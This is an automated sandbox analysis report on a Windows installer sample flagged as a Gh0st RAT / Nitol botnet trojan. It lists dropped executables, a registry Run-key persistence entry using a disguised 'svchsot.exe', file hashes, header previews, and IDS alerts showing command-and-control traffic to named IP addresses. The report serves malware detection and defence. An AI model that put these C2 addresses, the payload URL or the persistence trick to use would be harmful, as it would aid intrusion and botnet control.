                      https://deff.nelreports.net/api/report?cat=msn .exe, 00000005.00000002.3268535550.000000000224B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorErrorG3izWAY3Fa.exefalse
                          		high
                          http://192.168.2.1/v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://192.168.2.1/&v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              120.48.34.233
                              		unknownChina
                              		4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                              93.46.8.90
                              		chinagov.8800.orgItaly
                              		12874FASTWEBITtrue

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1579781
                              Start date and time:2024-12-23 09:12:20 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 12m 26s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:109
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:G3izWAY3Fa.exe
                              renamed because original name is a hash value
                              Original Sample Name:118F7F61B6AFB1DA5E94EA1740222C73.exe
                              Detection:MAL
                              Classification:mal78.spre.bank.troj.spyw.evad.winEXE@155/6@4/3
                              EGA Information:
                              • Successful, ratio: 80%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 166
                              • Number of non-executed functions: 225
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 52.149.20.212
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtFsControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: G3izWAY3Fa.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:13:18AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC C:\Windows\XXXXXX05CA35CC\svchsot.exe

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              s-part-0035.t-0009.t-msedge.netFBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                              • 13.107.246.63
                              mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • 13.107.246.63
                              nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                              • 13.107.246.63
                              uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • 13.107.246.63
                              dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.63
                              ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • 13.107.246.63
                              stealcy11.exeGet hashmaliciousStealcBrowse
                              • 13.107.246.63
                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.63
                              fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                              • 13.107.246.63

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CHINANET-BACKBONENo31Jin-rongStreetCNarmv6l.elfGet hashmaliciousUnknownBrowse
                              • 61.146.165.65
                              armv4l.elfGet hashmaliciousUnknownBrowse
                              • 14.118.130.115
                              2.elfGet hashmaliciousUnknownBrowse
                              • 59.175.154.153
                              3.elfGet hashmaliciousUnknownBrowse
                              • 36.45.84.63
                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                              • 123.163.227.84
                              loligang.arm.elfGet hashmaliciousMiraiBrowse
                              • 111.226.186.147
                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                              • 27.146.124.78
                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                              • 111.182.110.21
                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                              • 119.120.60.137
                              FASTWEBIT3.elfGet hashmaliciousUnknownBrowse
                              • 93.43.39.17
                              nshkppc.elfGet hashmaliciousMiraiBrowse
                              • 81.208.26.156
                              spc.elfGet hashmaliciousMirai, MoobotBrowse
                              • 93.55.23.150
                              x86.elfGet hashmaliciousMirai, MoobotBrowse
                              • 93.36.234.160
                              nshkmpsl.elfGet hashmaliciousMiraiBrowse
                              • 81.208.26.144
                              na.elfGet hashmaliciousMiraiBrowse
                              • 37.186.250.137
                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 2.235.85.103
                              mips.elfGet hashmaliciousMiraiBrowse
                              • 93.41.34.191
                              nshmpsl.elfGet hashmaliciousMiraiBrowse
                              • 2.229.236.206
                              nshmips.elfGet hashmaliciousMiraiBrowse
                              • 93.43.39.12

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Windows\SysWOW64\05CA35CC

                              Download File
                              Process:C:\Windows\Temp\server.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):7
                              Entropy (8bit):2.8073549220576046
                              Encrypted:false
                              SSDEEP:3:qR:qR
                              MD5:7A1920D61156ABC05A60135AEFE8BC67
                              SHA1:808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E
                              SHA-256:21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
                              SHA-512:94ABFC7B11F4311E8E279B580907FEFC1118690479FB7E13F0C22ADE816BC2B63346498833B0241EEC2B09E15172E13027DC85024BACB7BC40C150F4131F7292
                              Malicious:false
                              Preview:Default

                              C:\Windows\Temp\ .exe

                              Download File
                              Process:C:\Users\user\Desktop\G3izWAY3Fa.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):1429612
                              Entropy (8bit):6.009627235349156
                              Encrypted:false
                              SSDEEP:24576:GvbBARGCfE5TVUUCql3jpomr6RTmBfOKpf37Q+zAV9/NaCWxI7IPBRiAY:WARGEvqlzpomr6RTmBfOKpf37Q+zAV92
                              MD5:CCEE0912E79D434F0D2C1E11274F23C0
                              SHA1:9A34CD426601ACE88DCB91B3820DC98EBE29ED96
                              SHA-256:679B9AF0DEF4DBBE2E179AC05F9A7AB4C2FFC28A71964A9E9EDF2986BDC1B1A2
                              SHA-512:B87212CC683F2DF362E11F1B509D29B482A9560E04E562E580BD58755F6FE25C0BBF4CB525E793F205656F16AD32C7B909FC53E9C137E8A5F4415BAA5FF0977E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 4%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.._.._.@W..._.9|.._..|.._..W..._.@W..._.._..]..S.._..S..a_..S..H_./T..._..S..._.Rich._.................PE..L......H.................@...................P....@.............................................................................@........B..........................PV..............................`...H............P..L.......@....................text...~>.......@.................. ..`.rdata.......P.......P..............@..@.data...t\...P...0...P..............@....rsrc....B.......P..................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\Temp\server.exe

                              Download File
                              Process:C:\Users\user\Desktop\G3izWAY3Fa.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):7.5898551091068285
                              Encrypted:false
                              SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
                              MD5:8A953A49796B7F8C7539A6B2BC175397
                              SHA1:5E4B317DD08B080EDCF127FF6E5F86F0108372BE
                              SHA-256:ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
                              SHA-512:5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 95%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\Temp\v5.exe

                              Download File
                              Process:C:\Users\user\Desktop\G3izWAY3Fa.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):16896
                              Entropy (8bit):7.562483931351241
                              Encrypted:false
                              SSDEEP:384:PWxP8NYOCgS7+h4vIpWEXSPTNy2ineaLM1ies89sxLrG:uaiOCz6n4EXS7rirVer9sNr
                              MD5:48A02F4A003E8CBE683CF5DADA237168
                              SHA1:2A81C0962ADEEF89CE33DE746ADFD455C652D216
                              SHA-256:11933D11631C99743C3F457B30D5EBB72399BF52D53B51E9CD21E17B1CA1DFB0
                              SHA-512:A372B54806840A1D6DDAAFDCB7D5D1218A086DED2FE51C70C89034BA6CB9D644AC914AF998A4E4F614E0C990A864059A8618B1EDD28D39CC96C6FC74D9631F12
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 100%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1...b...b...b...b...b>..b...b...b...b...b...b~.b...b...b...bU..b...bz..b...bRich...b........................PE..L....>nU.................@........................@.................................................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                              C:\Windows\XXXXXX05CA35CC\svchsot.exe

                              Download File
                              Process:C:\Windows\Temp\server.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):7.5898551091068285
                              Encrypted:false
                              SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
                              MD5:8A953A49796B7F8C7539A6B2BC175397
                              SHA1:5E4B317DD08B080EDCF127FF6E5F86F0108372BE
                              SHA-256:ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
                              SHA-512:5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 95%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                              \Device\Null

                              Download File
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):24
                              Entropy (8bit):4.188721875540868
                              Encrypted:false
                              SSDEEP:3:oCfe49:oCfD
                              MD5:6B2C41D2A2AF44EFB642F9C3DBCA6668
                              SHA1:5D98044E6220AD035474C209EF75CB8F37C6965C
                              SHA-256:623F011819A1BD73F84EE6593735C89462E596A4AD0B730B0F650A486D63E4C8
                              SHA-512:8C419F40477E11A315F30F79F61EFC17178B2C851276F4FD35175032073296787610DB29DA9C99A8B97551F22B01625A2F19CAFF6CD25B6F5E691AD56C3822E9
                              Malicious:false
                              Preview:C:\Windows\temp\v5.exe..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):6.913255582101916
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 92.16%
                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:G3izWAY3Fa.exe
                              File size:963'286 bytes
                              MD5:118f7f61b6afb1da5e94ea1740222c73
                              SHA1:5a0d66ec18cdb3812bad259999cf64d051cefa8b
                              SHA256:aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
                              SHA512:a98dc6940d0a3026075b77d406f5481a0071c1c6465027f3da13716932e0fd6bd06c73a48aa068ba2206210b7f9ab057232323c548f090d71baa5d4ba128e791
                              SSDEEP:12288:YIrxBdnioD+GL4DY6TMMQ77iOF8X8WBBXnBZwECeLqq3RCmK9JI25q5iedndTIQe:PBRiEUDpZQ1abzwEJLfRWzIiednd518
                              TLSH:F425F04E65955B82C8F40D34837AB22E41246D1B49F4A7F5B4A9FF0EF93CC89CD36A21
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........

                              File Icon

                              Icon Hash:2e6343696c6b572e

                              Static PE Info

                              General

                              Entrypoint:0x4030cb
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:7fa974366048f9c551ef45714595665e

                              Entrypoint Preview

                              Instruction
                              sub esp, 00000180h
                              push ebx
                              push ebp
                              push esi
                              xor ebx, ebx
                              push edi
                              mov dword ptr [esp+18h], ebx
                              mov dword ptr [esp+10h], 00409160h
                              xor esi, esi
                              mov byte ptr [esp+14h], 00000020h
                              call dword ptr [00407030h]
                              push 00008001h
                              call dword ptr [004070B0h]
                              push ebx
                              call dword ptr [0040727Ch]
                              push 00000008h
                              mov dword ptr [00423F38h], eax
                              call 00007F24E4E7FCA6h
                              mov dword ptr [00423E84h], eax
                              push ebx
                              lea eax, dword ptr [esp+34h]
                              push 00000160h
                              push eax
                              push ebx
                              push 0041F430h
                              call dword ptr [00407158h]
                              push 00409154h
                              push 00423680h
                              call 00007F24E4E7F959h
                              call dword ptr [004070ACh]
                              mov edi, 00429000h
                              push eax
                              push edi
                              call 00007F24E4E7F947h
                              push ebx
                              call dword ptr [0040710Ch]
                              cmp byte ptr [00429000h], 00000022h
                              mov dword ptr [00423E80h], eax
                              mov eax, edi
                              jne 00007F24E4E7D0BCh
                              mov byte ptr [esp+14h], 00000022h
                              mov eax, 00429001h
                              push dword ptr [esp+14h]
                              push eax
                              call 00007F24E4E7F43Ah
                              push eax
                              call dword ptr [0040721Ch]
                              mov dword ptr [esp+1Ch], eax
                              jmp 00007F24E4E7D115h
                              cmp cl, 00000020h
                              jne 00007F24E4E7D0B8h
                              inc eax
                              cmp byte ptr [eax], 00000020h
                              je 00007F24E4E7D0ACh
                              cmp byte ptr [eax], 00000022h
                              mov byte ptr [eax+eax+00h], 00000000h

                              Rich Headers

                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x57180.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x58d20x5a00c69726ed422d3dcfdec9731986daa752False0.665234375data6.4331003482809646IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x70000x11900x1200a2c7710fa66fcbb43c7ef0ab9eea5e9aFalse0.4453125data5.179763757809345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x90000x1af780x400e59cdcb732e4bfbc84cc61dd68354f78False0.55078125data4.617802320695973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata0x240000x80000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x2c0000x571800x57200f51866e7e004246d34522d99909dd728False0.28211587607604016data3.929478885850329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x2c2b00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.25987883539959167
                              RT_ICON0x6e2d80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.31632260735833434
                              RT_ICON0x7eb000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4346473029045643
                              RT_ICON0x810a80xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.5481481481481482
                              RT_ICON0x81d500x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5434426229508197
                              RT_ICON0x826d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6453900709219859
                              RT_DIALOG0x82b400x144dataEnglishUnited States0.5216049382716049
                              RT_DIALOG0x82c880x100dataEnglishUnited States0.5234375
                              RT_DIALOG0x82d880x11cdataEnglishUnited States0.6056338028169014
                              RT_DIALOG0x82ea80x60dataEnglishUnited States0.7291666666666666
                              RT_GROUP_ICON0x82f080x5adataEnglishUnited States0.8111111111111111
                              RT_MANIFEST0x82f680x215XML 1.0 document, ASCII text, with very long lines (533), with no line terminatorsEnglishUnited States0.575984990619137

                              Imports

                              DLLImport
                              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949902120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94984193.46.8.908090TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949863120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94998946.82.174.698090TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94998693.46.8.908090TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949985120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949988120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94992893.46.8.908090TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949987120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949723120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949770120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94976193.46.8.908090TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949944120.48.34.2338080TCP
                              2024-12-23T09:13:10.187285+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949816120.48.34.2338080TCP
                              2024-12-23T09:13:17.322358+01002013214ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server1192.168.2.949717120.48.34.2338000TCP
                              2024-12-23T09:13:17.322358+01002016922ET MALWARE Backdoor family PCRat/Gh0st CnC traffic1192.168.2.949717120.48.34.2338000TCP
                              2024-12-23T09:13:18.363697+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949723120.48.34.2338080TCP
                              2024-12-23T09:13:18.814318+01002048478ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive1120.48.34.2338000192.168.2.949717TCP
                              2024-12-23T09:13:18.814318+01002808814ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response1120.48.34.2338000192.168.2.949717TCP
                              2024-12-23T09:13:37.071523+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94976193.46.8.908090TCP
                              2024-12-23T09:13:41.286544+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949770120.48.34.2338080TCP
                              2024-12-23T09:14:03.725639+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949816120.48.34.2338080TCP
                              2024-12-23T09:14:19.283148+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94984193.46.8.908090TCP
                              2024-12-23T09:14:26.436544+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949863120.48.34.2338080TCP
                              2024-12-23T09:14:48.925491+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949902120.48.34.2338080TCP
                              2024-12-23T09:15:01.201380+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94992893.46.8.908090TCP
                              2024-12-23T09:15:19.384989+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949944120.48.34.2338080TCP
                              2024-12-23T09:15:34.537181+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949985120.48.34.2338080TCP
                              2024-12-23T09:15:41.766783+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94998693.46.8.908090TCP
                              2024-12-23T09:15:56.678352+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949987120.48.34.2338080TCP
                              2024-12-23T09:16:19.335820+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949988120.48.34.2338080TCP
                              2024-12-23T09:16:36.233553+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94998946.82.174.698090TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 23, 2024 09:13:17.165060997 CET497178000192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:17.284657001 CET800049717120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:17.284813881 CET497178000192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:17.322357893 CET497178000192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:17.441999912 CET800049717120.48.34.233192.168.2.9
                              Dec 23, 2024 09:13:18.238933086 CET497238080192.168.2.9120.48.34.233
                              Dec 23, 2024 09:13:18.292098045 CET4972480192.168.2.9192.168.2.1
